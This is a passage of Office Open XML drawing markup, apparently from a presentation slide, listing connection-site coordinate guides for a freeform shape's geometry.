              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 212860 h 6858000"/>
